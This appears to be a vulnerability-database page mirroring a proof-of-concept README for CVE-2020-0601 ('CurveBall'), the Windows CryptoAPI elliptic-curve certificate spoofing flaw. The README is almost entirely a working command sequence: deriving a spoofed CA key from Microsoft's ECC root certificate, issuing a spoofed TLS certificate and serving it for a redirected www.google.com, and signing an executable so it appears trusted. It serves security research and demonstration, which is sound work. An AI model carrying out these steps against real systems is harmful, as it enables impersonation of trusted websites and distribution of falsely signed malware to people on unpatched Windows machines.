CVE-2020-0601 PoC — Microsoft Windows CryptoAPI 信任管理问题漏洞

Source

https://github.com/JoelBts/CVE-2020-0601_PoC

Associated Vulnerability

Title:Microsoft Windows CryptoAPI 信任管理问题漏洞 (CVE-2020-0601)
Description:A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source, aka 'Windows CryptoAPI Spoofing Vulnerability'.

Description

Demonstration of CVE-2020-0601 aka curveball. Based on the PoC's available at https://github.com/kudelskisecurity/chainoffools and https://github.com/ly4k/CurveBall

Readme

# Based on POC's https://github.com/ly4k/CurveBall
# https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/
# https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file

-----------------------------
# REQUIREMENTS/SOFFTWARE USED
-----------------------------

python version 3.11
openssl version 3.1
osslsigncode version 2.5
python libraries in gen-key.py httpServer.py

-------------------------
# TLS CERTIFICATE SIGNING
-------------------------

# Create a spoofed CA key from the trusted root certificate (must be secp384r1 and in PEM format)
python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

# Create a spoofed CA using the spoofed key
openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

# Create another SSL certificate (of any kind) that will be signed by the spoofed CA
openssl ecparam -name secp384r1 -genkey -noout -out cert.key

# Create a certificate signing request for the certificate
openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

# Sign the CSR using the spoofed CA certificate
openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

# Start a HTTPS server with the spoofed certificate chain
python httpServer.py

# IN WINDOWS MACHINE
# Add <kali.machine.ip> www.google.com to the hosts file (redirects google to the server)
# visit HTTPS://www.google.com
# Certificate should be trusted, and 'Hello World' should be displayed
# If error occurs, check system time is correct


--------------
# CODE SIGNING
--------------

# Create a spoofed CA key from the trusted root certificate (must be secp384r1 and in PEM format)
python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

# Create a spoofed CA using the spoofed key
openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

# Create a new key that can be used for code signing
openssl ecparam -name secp384r1 -genkey -noout -out cert.key

# Create a certificate signing request using the key, which we can sign
openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

# Sign the CSR using the spoofed CA
openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

# Pack the key, certificate, and spoofed CA into a PKCS12 file for signing exes
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

# Use the PKCS12 file to sign an executable
osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!